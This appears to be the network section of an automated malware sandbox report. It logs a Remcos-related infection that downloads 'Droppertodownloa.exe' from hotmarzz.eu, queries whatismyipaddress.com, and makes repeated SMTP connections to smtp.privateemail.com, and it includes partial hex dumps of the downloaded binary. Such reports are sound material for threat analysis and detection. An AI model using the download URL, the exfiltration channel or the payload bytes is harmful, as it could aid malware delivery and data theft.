                                                                                              Dec 7, 2021 13:40:32.802365065 CET5874977766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:32.802500010 CET5874977766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:32.802721977 CET5874977766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:32.802789927 CET5874977766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:32.802818060 CET5874977766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:32.802937031 CET5874977766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:32.803261995 CET5874977766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:32.803380013 CET5874977766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:32.803394079 CET5874977766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:32.812388897 CET5874977766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:32.828083992 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:40:32.834247112 CET497261975192.168.2.4185.157.161.174
                                                                                              Dec 7, 2021 13:40:32.942059994 CET49777587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:33.106024981 CET197549726185.157.161.174192.168.2.4
                                                                                              Dec 7, 2021 13:40:34.818047047 CET49777587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:34.977045059 CET5874977766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:34.977433920 CET5874977766.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:34.977509022 CET49777587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:34.992300034 CET4976980192.168.2.4104.16.154.36
                                                                                              Dec 7, 2021 13:40:34.992363930 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:35.150934935 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:35.151495934 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:35.311477900 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:35.311795950 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:35.470103979 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:35.470155001 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:35.470421076 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:35.628663063 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:35.630603075 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:35.788955927 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:35.789020061 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:35.791719913 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:35.793616056 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:35.949771881 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:35.949815989 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:35.951577902 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:35.952198029 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:35.952743053 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.110706091 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.112646103 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.113161087 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.275322914 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.275969982 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.434026957 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.436959028 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.437547922 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.596458912 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.620183945 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.620769978 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.779227972 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.780452967 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.781430960 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.781764984 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.782063961 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.782377005 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.782691002 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.782974958 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.783273935 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.783575058 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.783876896 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.784158945 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.784730911 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.785015106 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.785310984 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.785631895 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.785926104 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.786386013 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.939872980 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.939929008 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.940116882 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.940370083 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.940386057 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.940440893 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.940896034 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.940968037 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.941083908 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.941117048 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.941131115 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.941430092 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.941479921 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.941531897 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.941647053 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.941683054 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.941695929 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.941883087 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.941915989 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.941972971 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.942085028 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.942116022 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.942135096 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.942234993 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.942770958 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.942838907 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.942874908 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.942910910 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.942925930 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.943253994 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.943295956 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.943331003 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.943543911 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.943605900 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.943665028 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.943895102 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.943931103 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.943950891 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.943957090 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.944251060 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:36.944313049 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:36.944328070 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.098161936 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.098267078 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.098299980 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.098321915 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.098392963 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.098402977 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.098973989 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.099004984 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.099078894 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.099118948 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.099342108 CET5874977966.29.159.53192.168.2.4
                                                                                              Dec 7, 2021 13:40:37.099423885 CET49779587192.168.2.466.29.159.53
                                                                                              Dec 7, 2021 13:40:37.099442959 CET49779587192.168.2.466.29.159.53

                                                                                              UDP Packets


                                                                                              DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Dec 7, 2021 13:38:54.419747114 CET | 192.168.2.4 | 8.8.8.8 | 0x7c22 | Standard query (0) | hotmarzz.eu | A (IP address) | IN (0x0001)
Dec 7, 2021 13:39:04.555217981 CET | 192.168.2.4 | 8.8.8.8 | 0x9640 | Standard query (0) | hotmarzz.eu | A (IP address) | IN (0x0001)
Dec 7, 2021 13:40:08.350580931 CET | 192.168.2.4 | 8.8.8.8 | 0xdb86 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Dec 7, 2021 13:40:10.723212957 CET | 192.168.2.4 | 8.8.8.8 | 0xc113 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Dec 7, 2021 13:40:12.189601898 CET | 192.168.2.4 | 8.8.8.8 | 0xdbfb | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Dec 7, 2021 13:40:12.949274063 CET | 192.168.2.4 | 8.8.8.8 | 0xf725 | Standard query (0) | 216.47.6.0.in-addr.arpa | PTR (Pointer record) | IN (0x0001)
Dec 7, 2021 13:40:13.445142031 CET | 192.168.2.4 | 8.8.8.8 | 0xbe78 | Standard query (0) | whatismyipaddress.com | A (IP address) | IN (0x0001)
Dec 7, 2021 13:40:15.629826069 CET | 192.168.2.4 | 8.8.8.8 | 0x520f | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Dec 7, 2021 13:40:19.139693022 CET | 192.168.2.4 | 8.8.8.8 | 0x6d84 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Dec 7, 2021 13:40:24.461853981 CET | 192.168.2.4 | 8.8.8.8 | 0xb537 | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Dec 7, 2021 13:40:29.888415098 CET | 192.168.2.4 | 8.8.8.8 | 0xde1b | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)
Dec 7, 2021 13:40:34.969656944 CET | 192.168.2.4 | 8.8.8.8 | 0xca5c | Standard query (0) | smtp.privateemail.com | A (IP address) | IN (0x0001)

                                                                                              DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Dec 7, 2021 13:38:51.444931984 CET | 8.8.8.8 | 192.168.2.4 | 0x52b2 | No error (0) | a-0019.a.dns.azurefd.net | a-0019.standard.a-msedge.net | | CNAME (Canonical name) | IN (0x0001)
Dec 7, 2021 13:38:54.454328060 CET | 8.8.8.8 | 192.168.2.4 | 0x7c22 | No error (0) | hotmarzz.eu | | 195.110.124.154 | A (IP address) | IN (0x0001)
Dec 7, 2021 13:39:04.588227034 CET | 8.8.8.8 | 192.168.2.4 | 0x9640 | No error (0) | hotmarzz.eu | | 81.88.52.165 | A (IP address) | IN (0x0001)
Dec 7, 2021 13:40:08.374262094 CET | 8.8.8.8 | 192.168.2.4 | 0xdb86 | No error (0) | smtp.privateemail.com | | 66.29.159.53 | A (IP address) | IN (0x0001)
Dec 7, 2021 13:40:10.744484901 CET | 8.8.8.8 | 192.168.2.4 | 0xc113 | No error (0) | smtp.privateemail.com | | 66.29.159.53 | A (IP address) | IN (0x0001)
Dec 7, 2021 13:40:12.210922956 CET | 8.8.8.8 | 192.168.2.4 | 0xdbfb | No error (0) | smtp.privateemail.com | | 66.29.159.53 | A (IP address) | IN (0x0001)
Dec 7, 2021 13:40:12.969023943 CET | 8.8.8.8 | 192.168.2.4 | 0xf725 | Name error (3) | 216.47.6.0.in-addr.arpa | none | none | PTR (Pointer record) | IN (0x0001)
Dec 7, 2021 13:40:13.468687057 CET | 8.8.8.8 | 192.168.2.4 | 0xbe78 | No error (0) | whatismyipaddress.com | | 104.16.154.36 | A (IP address) | IN (0x0001)
Dec 7, 2021 13:40:13.468687057 CET | 8.8.8.8 | 192.168.2.4 | 0xbe78 | No error (0) | whatismyipaddress.com | | 104.16.155.36 | A (IP address) | IN (0x0001)
Dec 7, 2021 13:40:15.649581909 CET | 8.8.8.8 | 192.168.2.4 | 0x520f | No error (0) | smtp.privateemail.com | | 66.29.159.53 | A (IP address) | IN (0x0001)
Dec 7, 2021 13:40:19.159317970 CET | 8.8.8.8 | 192.168.2.4 | 0x6d84 | No error (0) | smtp.privateemail.com | | 66.29.159.53 | A (IP address) | IN (0x0001)
Dec 7, 2021 13:40:24.483339071 CET | 8.8.8.8 | 192.168.2.4 | 0xb537 | No error (0) | smtp.privateemail.com | | 66.29.159.53 | A (IP address) | IN (0x0001)
Dec 7, 2021 13:40:29.906827927 CET | 8.8.8.8 | 192.168.2.4 | 0xde1b | No error (0) | smtp.privateemail.com | | 66.29.159.53 | A (IP address) | IN (0x0001)
Dec 7, 2021 13:40:34.990272045 CET | 8.8.8.8 | 192.168.2.4 | 0xca5c | No error (0) | smtp.privateemail.com | | 66.29.159.53 | A (IP address) | IN (0x0001)

                                                                                              HTTP Request Dependency Graph

                                                                                              • hotmarzz.eu
                                                                                              • whatismyipaddress.com

                                                                                              HTTP Packets

                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                              0192.168.2.44973981.88.52.165443C:\Users\user\AppData\Roaming\Remcos\remcos.exe
                                                                                              TimestampkBytes transferredDirectionData


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49727 | 195.110.124.154 | 80 | C:\Users\user\AppData\Local\Temp\bin.exe
Timestamp | kBytes transferred | Direction | Data
Dec 7, 2021 13:38:54.534826040 CET | 417 | OUT | GET /goods/Droppertodownloa.exe HTTP/1.1
                                                                                              Accept: */*
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                              Host: hotmarzz.eu
                                                                                              Connection: Keep-Alive
Dec 7, 2021 13:38:54.593884945 CET | 418 | IN | HTTP/1.1 404 Not Found
                                                                                              Date: Tue, 07 Dec 2021 12:38:54 GMT
                                                                                              Server: Apache
                                                                                              Vary: Accept-Encoding
                                                                                              Content-Encoding: gzip
                                                                                              Content-Length: 192
                                                                                              Keep-Alive: timeout=2, max=90
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=iso-8859-1


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49738 | 81.88.52.165 | 80 | C:\Users\user\AppData\Roaming\Remcos\remcos.exe
Timestamp | kBytes transferred | Direction | Data
Dec 7, 2021 13:39:04.706928015 CET | 1339 | OUT | GET /goods/Droppertodownloa.exe HTTP/1.1
                                                                                              Accept: */*
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                              Host: hotmarzz.eu
                                                                                              Connection: Keep-Alive
Dec 7, 2021 13:39:04.766505957 CET | 1340 | IN | HTTP/1.1 302 Found
                                                                                              Date: Tue, 07 Dec 2021 12:39:04 GMT
                                                                                              Server: Apache
                                                                                              Location: https://hotmarzz.eu/goods/Droppertodownloa.exe
                                                                                              Content-Length: 230
                                                                                              Keep-Alive: timeout=5, max=150
                                                                                              Connection: Keep-Alive
                                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hotmarzz.eu/goods/Droppertodownloa.exe">here</a>.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49769 | 104.16.154.36 | 80 | C:\Users\user\AppData\Roaming\Windows Update.exe
Timestamp | kBytes transferred | Direction | Data
Dec 7, 2021 13:40:13.525902987 CET | 5182 | OUT | GET / HTTP/1.1
                                                                                              Host: whatismyipaddress.com
                                                                                              Connection: Keep-Alive
Dec 7, 2021 13:40:13.559828997 CET | 5183 | IN | HTTP/1.1 403 Forbidden
                                                                                              Date: Tue, 07 Dec 2021 12:40:13 GMT
                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                              Content-Length: 16
                                                                                              Connection: keep-alive
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              Referrer-Policy: same-origin
                                                                                              Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                              Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                                                              Set-Cookie: __cf_bm=ifc0FPkloiDp4Z1dpnjRqVqzqGMxVbTyrezZskC9KWs-1638880813-0-AXIdIT11xgQ5MMyVhDMcgQ9hAm7CPQjGNWgAvVdJNr0NNS/V7JbsqjReMXqFEa72rdjIhPL268dzLJd98EhxMqI=; path=/; expires=Tue, 07-Dec-21 13:10:13 GMT; domain=.whatismyipaddress.com; HttpOnly
                                                                                              Server: cloudflare
                                                                                              CF-RAY: 6b9dd23c9d0368fb-FRA
                                                                                              alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                              Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30
                                                                                              Data Ascii: error code: 1020


                                                                                              HTTPS Proxied Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49739 | 81.88.52.165 | 443 | C:\Users\user\AppData\Roaming\Remcos\remcos.exe
Timestamp | kBytes transferred | Direction | Data
2021-12-07 12:39:06 UTC | 0 | OUT | GET /goods/Droppertodownloa.exe HTTP/1.1
                                                                                              Accept: */*
                                                                                              Accept-Encoding: gzip, deflate
                                                                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                              Connection: Keep-Alive
                                                                                              Host: hotmarzz.eu
2021-12-07 12:39:06 UTC | 0 | IN | HTTP/1.1 200 OK
                                                                                              Date: Tue, 07 Dec 2021 12:39:06 GMT
                                                                                              Server: Apache
                                                                                              Upgrade: h2,h2c
                                                                                              Connection: Upgrade, close
                                                                                              Last-Modified: Mon, 06 Dec 2021 01:46:55 GMT
                                                                                              ETag: "1a05452-23e000-5d2706e852721"
                                                                                              Accept-Ranges: bytes
                                                                                              Content-Length: 2351104
                                                                                              Vary: Accept-Encoding,User-Agent
                                                                                              Content-Type: application/x-msdownload
                                                                                              Data Ascii: ?????????
                                                                                              2021-12-07 12:39:06 UTC187INData Raw: 2b 74 4d 3a 75 6c 1b ed 19 b6 26 7b 39 8e ad e5 b7 02 c9 df 2b d1 27 36 01 e9 73 b7 f5 76 a0 78 1b 1d dd 1e 91 30 95 bb 36 15 2d ad 2d a0 67 39 b1 34 c2 6f 5c 74 57 b4 f3 00 31 ca 01 c8 85 a0 b4 fc bd d3 b3 fc 0c 55 e3 b8 ae ae ad c9 da 40 2e 02 9e d5 71 f1 a0 88 91 00 70 b1 ae ea 3f 6f 1f 3e a3 00 b5 e0 3a 2e 09 4b db 5a 82 1f c3 08 40 64 b8 48 c7 45 45 04 44 4c f3 af 15 11 44 44 d3 aa c2 6a 99 86 8b 06 4a cc 04 20 f8 10 c0 75 4d f8 bf 50 c4 75 51 09 2d f9 ea 8b 75 5c 34 48 e2 24 00 e7 e8 b8 a8 57 d5 6a 14 60 21 b8 22 ba 86 ab b4 dc 33 41 12 8b 3b f3 3f 6e bd b2 2b 3f ff 3f 58 84 d8 ae f4 53 6f 92 ba 26 08 89 9c fc 91 bb 77 44 76 0f c1 b8 44 00 e7 e8 48 00 8a e9 fb d7 0d 71 75 e5 01 38 87 08 27 02 e3 22 00 1f d0 71 51 11 89 49 8c 15 04 da 46 52 ce c2 08
                                                                                              Data Ascii: +tM:ul&{9+'6svx06--g94o\tW1U@.qp?o>:.KZ@dHEEDLDDjJ uMPuQ-u\4H$Wj`!"3A;?n+??XSo&wDvDHqu8'"qQIFR
                                                                                              2021-12-07 12:39:06 UTC195INData Raw: 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 51 82 d3 0f 53 85 d8 aa 54 86 d8 fe 54 86 d8 ff 54 86 d8 ff 54 86 d8 fe 54 86 d8 ff 54 86 d8 ff 54 86 d8 fe 54 86 d8 ff 54 86 d8 ff 54 86 d8 fe 54 86 d8 ff 54 86 d8 ff 54 86 d8 fe 54 86 d8 ff 54 86 d8 de 53 85 d7 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                              Data Ascii: XQSTTTTTTTTTTTTTTTS9
                                                                                              2021-12-07 12:39:06 UTC203INData Raw: ff 47 47 e4 87 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 30 91 05 4e 4e eb b8 4c 4c e9 ff 4b 4b e8 ff 49 49 e7 ff 48 48 e5 ff 46 46 e4 ff 45 45 e2 fe 43 43 e0 63 00 00 00 00 00 00 00 00 2c 2c 98 06 43 43 e1 c0 44 44 e1 ff 45 45 e2 ff 46 46 e3 ff 47 47 e4 ff 47 47 e5 ff 48 48 e6 fe 48 48 e4 5f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 29 29 7a 01 4f 4f ec a3 4e 4e eb ff 4c 4c e9 ff 4b 4b e8 ff 49 49 e7 ff 48 48 e5 ff 46 46 e4 ff 45 45 e2 83 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 36 b3 12 45 45 e3 d9 46 46 e4 ff 47 47 e5 ff 48 48 e5 ff 49 49
                                                                                              Data Ascii: GG00NNLLKKIIHHFFEECCc,,CCDDEEFFGGGGHHHH_))zOONNLLKKIIHHFFEE66EEFFGGHHII
                                                                                              2021-12-07 12:39:06 UTC211INData Raw: f3 3b 0b 07 67 9a cf d2 b5 ef 1e 9b d9 7e 7e 7f b5 cf 5f 7e 18 e7 9f da ae 7f b1 c5 f7 1d 7b 86 8c bb bf f6 cf 9b 66 86 af 65 57 0b 57 bc 75 a6 d9 ee 77 35 b4 5d 0b d5 9c d9 c9 d3 3b 65 a7 fc 7f 29 13 23 e2 e7 81 1a 93 ef 9d 1d 8e 67 cf 37 8c 79 15 d4 87 66 9b f3 df b7 1a fa bd b1 ff 3d 2d f4 fd ad d9 cd 5c e3 91 d9 66 1e f2 27 b3 cd ef bf 5c 52 9f 91 fd 15 3c f3 a5 d9 75 1c d3 fd 9e 68 59 e7 f5 2d fb 62 ad b2 7f 9a dd c1 c8 9d f2 ca 39 fb be 01 8e f9 c3 e6 21 fb 6b df 3e 3b d7 f0 dd d9 5c b3 cf eb 7e 77 cd 0d 5f 4b 30 37 da 3a d1 08 67 8e 07 6a ee 16 cd 0d e7 36 77 cf 35 f3 e4 0f ce 35 7f 87 39 53 e3 c4 43 f0 cc ef cc 6d 7c 8f ec d1 b9 e6 b5 68 db 7d 65 6e 07 0b 76 ca 4e d9 29 3b 65 a7 fc df fc 1e 5d e7 bf cf ee 1b 9e 97 f4 bb 83 0f c2 d0 7f b9 af be f1
                                                                                              Data Ascii: ;g~~_~{feWWuw5];e)#g7yf=-\f'\R<uhY-b9!k>;\~w_K07:gj6w559SCm|h}envN);e]
                                                                                              2021-12-07 12:39:06 UTC219INData Raw: 90 6a d5 63 31 c6 59 b9 4f 8e 92 51 9a d2 ed b5 41 83 fd 1f 0f f5 df 88 95 2f f8 65 2a 1b 02 26 98 b4 08 ea 3f c7 24 8f 7c d4 7f ab 8a f7 70 0b 6e 46 85 59 09 9f 69 58 78 f6 5c ad c8 b8 23 32 c3 9f d4 a7 32 f5 45 f5 3a dd 0f 76 3c 8a ad 62 a6 b9 a6 58 25 bc 8b 48 70 38 2a 4e 93 fd e2 cc 16 dd 97 c2 59 93 f5 5b 34 ce 77 b2 29 3d 26 27 34 fd fa 79 71 8f a7 cb 1c 24 fa 72 7d 7d cb b2 b5 64 17 6d 77 29 bd f5 a8 ce bc a2 49 d9 cd 6d 3d f7 c2 90 5f 6e bd 23 e2 58 13 66 5c 2c 73 bc 3e 9b 37 67 b6 56 c4 ec 59 27 62 2e ab e5 f2 f5 a2 0d 15 1d 17 5b 9a bd 36 df 2c e5 15 e1 41 77 3a bb 2a b3 32 ca dd 87 b5 ad ba d9 4c 68 57 f2 8f a3 62 ad 2f 3e 9d 16 5e 6c c5 e2 44 e6 6e af 09 fe bd d0 5b 7b 94 88 26 fd 6a 46 b9 d8 6b 85 b8 ea 9b 4b e8 f2 f3 4f 59 72 19 42 aa c6 a7
                                                                                              Data Ascii: jc1YOQA/e*&?$|pnFYiXx\#22E:v<bX%Hp8*NY[4w)=&'4yq$r}}dmw)Im=_n#Xf\,s>7gVY'b.[6,Aw:*2LhWb/>^lDn[{&jFkKOYrB
